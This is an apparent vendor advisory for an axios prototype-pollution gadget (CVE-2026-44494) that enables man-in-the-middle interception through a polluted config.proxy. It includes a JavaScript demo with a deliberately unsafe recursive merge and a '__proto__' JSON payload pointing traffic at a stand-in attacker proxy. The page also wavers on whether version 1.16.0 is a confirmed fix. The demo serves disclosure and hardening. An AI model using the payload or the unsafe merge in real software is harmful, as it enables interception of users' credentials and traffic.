CVE-2026-44494: Axios: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`
Axios is a promise-based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a prototype pollution "gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full man-in-the-middle (MITM) attack: intercepting, reading, and modifying all HTTP traffic, including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in the Axios defaults, the merged config object has no own proxy property, so a polluted Object.prototype.proxy is picked up as if it had been configured. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server. This vulnerability is fixed in 1.16.0.
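The gadget described above reduces to one property read. The following is an added illustration, not axios source code: a stand-in merged config with no own `proxy` key, a vulnerable resolver that reads `config.proxy` through the prototype chain, a hardened resolver that accepts only an own property, and a deliberately naive deep merge standing in for the separate dependency that introduces the pollution. The function names, the `attacker.example.test` proxy and the JSON payload are constructed for this example.

```javascript
'use strict';
// Added example, not axios source. Models the gadget: a merged request config
// with no own `proxy` property, read via plain property access, inherits
// whatever Object.prototype.proxy holds. All names and inputs are constructed.

// Stand-in for a merged config: copies own keys from defaults and the
// per-request options into a fresh object. `proxy` is deliberately absent,
// mirroring the advisory's point that the axios defaults do not set it.
function mergeConfig(defaults, request) {
  const merged = {};
  for (const key of Object.keys(defaults)) merged[key] = defaults[key];
  for (const key of Object.keys(request)) merged[key] = request[key];
  return merged;
}

// Gadget pattern: plain property access walks the prototype chain, so a
// polluted Object.prototype.proxy is returned as if the caller configured it.
function resolveProxyVulnerable(config) {
  return config.proxy;
}

// Hardened pattern: only an own property counts as a configured proxy.
function resolveProxyHardened(config) {
  return Object.prototype.hasOwnProperty.call(config, 'proxy')
    ? config.proxy
    : undefined;
}

// Runtime canary: true if something has already polluted the `proxy` key.
function hasPollutedProxy() {
  return Object.prototype.hasOwnProperty.call(Object.prototype, 'proxy');
}

// Constructed naive recursive merge of the kind that, elsewhere in a
// dependency tree, turns attacker-controlled JSON carrying a "__proto__" key
// into Object.prototype pollution. target["__proto__"] on a plain object is
// Object.prototype itself, so the recursion writes straight into it.
function unsafeDeepMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeDeepMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs the whole scenario and returns what each resolver saw before and
// during pollution, then removes the polluted key so it does not leak.
function demonstrate() {
  const config = mergeConfig(
    { method: 'get', timeout: 1000 },
    { url: 'https://api.example.test/login' } // constructed request
  );
  const before = {
    polluted: hasPollutedProxy(),
    vulnerable: resolveProxyVulnerable(config),
    hardened: resolveProxyHardened(config),
  };

  // Constructed attacker input, e.g. a JSON body reaching the naive merge.
  const payload = JSON.parse(
    '{"__proto__":{"proxy":{"protocol":"http","host":"attacker.example.test","port":8080}}}'
  );
  unsafeDeepMerge({}, payload);
  try {
    const during = {
      polluted: hasPollutedProxy(),
      vulnerable: resolveProxyVulnerable(config), // attacker's proxy object
      hardened: resolveProxyHardened(config),     // still undefined
      ownKeys: Object.keys(config),               // no 'proxy' among them
    };
    return { before, during };
  } finally {
    delete Object.prototype.proxy;
  }
}

console.log(JSON.stringify(demonstrate(), null, 2));
```

Run it with `node`. The config itself never changes; only the resolver's choice between inherited and own lookup decides whether the attacker's proxy is honoured. In a real application the pollution primitive comes from some other library, which is why the advisory rates this as a gadget rather than a stand-alone bug. The own-property check (or building the merged config with `Object.create(null)`) closes the gadget; freezing `Object.prototype` at startup is a broader defense-in-depth option but can break libraries that extend built-in prototypes, so test it before relying on it.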
Metrics
- CVSS v3.1: 8.7
- Severity: HIGH
- Fixed in: — (the advisory text above names 1.16.0; HarborGuard's tracker has not yet confirmed an upstream release)
- Affected Products: 1
HarborGuard Analysis
Synopsis
A prototype pollution gadget vulnerability in the Axios HTTP client library (versions >=1.0.0 and <1.16.0) allows an attacker to escalate any existing prototype pollution in the application's dependency tree into a full man-in-the-middle (MITM) attack. The CVSS vector rates the issue as network-reachable with no authentication, but exploitation depends on a pre-existing prototype pollution primitive elsewhere in the application; the gadget itself is the config.proxy property resolution path in Axios's HTTP adapter. Successful exploitation gives an attacker full read and write access to all HTTP traffic the affected application sends, including authentication credentials. HarborGuard tracks this advisory and will make a patched-image rebuild available the moment an upstream fix version is published.
HarborGuard Coverage
Detection (Available): Detection for CVE-2026-44494 is available across every HarborGuard environment: the CVE is ingested from upstream advisory feeds within minutes of publication and matched against all customer images, including custom-built Node.js application images that bundle an affected Axios version in their dependency tree. Any image containing axios in the range >=1.0.0 and <1.16.0 is flagged automatically.
Scoring and routing (Available): HarborGuard scores this finding at CVSS 8.7 HIGH and weights it against each environment's compliance policy to reflect the severity accurately. Routed findings land in the appropriate team inbox within each customer organization based on image ownership and policy configuration.
Remediation (Pending upstream): Because no fix version has been confirmed upstream yet, HarborGuard re-evaluates this advisory on every ingest cycle and will make a patched-image rebuild available automatically the moment an upstream release ships. For customers with auto-remediation enabled, the rebuild, regression-test run, and PR against affected workloads will be triggered without any manual intervention required.
Exploit Conditions
- Network reachability: Required
  The vulnerability is exploited over the network; the attacker must be able to deliver prototype pollution into the target application's runtime and have network-level visibility to act as a proxy endpoint.
- Authentication: Not required
  No credentials or account are needed; the attacker does not need to authenticate to the target service to exploit this vulnerability.
- Victim interaction: Not required
  No user action is required; exploitation occurs entirely within the server-side Node.js process when Axios resolves config.proxy through the prototype chain.
- Attack complexity: High
  Attack complexity is rated High because exploitation requires a pre-existing prototype pollution condition elsewhere in the dependency tree, plus timing or positioning to intercept traffic, rather than a single self-contained step.
Blast Radius
- The attacker intercepts all outbound HTTP requests made by the affected application, reading authentication tokens, API keys, and session credentials in transit.
- The attacker modifies HTTP request and response bodies in flight, allowing injection of malicious payloads into data the application trusts and acts on.
- Any downstream service the application communicates with is reachable through the forged proxy, expanding the attacker's foothold beyond the initially compromised process.
How HarborGuard Handles This
Available on HarborGuard: this CVE is actively tracked and any image containing axios >=1.0.0 and <1.16.0 is flagged on every scan, including images rebuilt from internal Dockerfiles that install dependencies via npm or yarn. Because no upstream fix version exists yet, HarborGuard re-checks the advisory on each ingest cycle and will make a patched-image rebuild available automatically once axios ships a remediated release. In the interim, customers can apply compensating controls through HarborGuard policy: network-egress filtering rules can block unauthorized outbound proxy destinations, and workloads running affected images can be isolated via network policy to limit the blast radius of a successful MITM escalation. For customers with auto-remediation enabled, the full rebuild, regression-test, and PR workflow will trigger without manual action the moment the upstream patch is available.
- axios / axios: >= 1.0.0, < 1.16.0
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N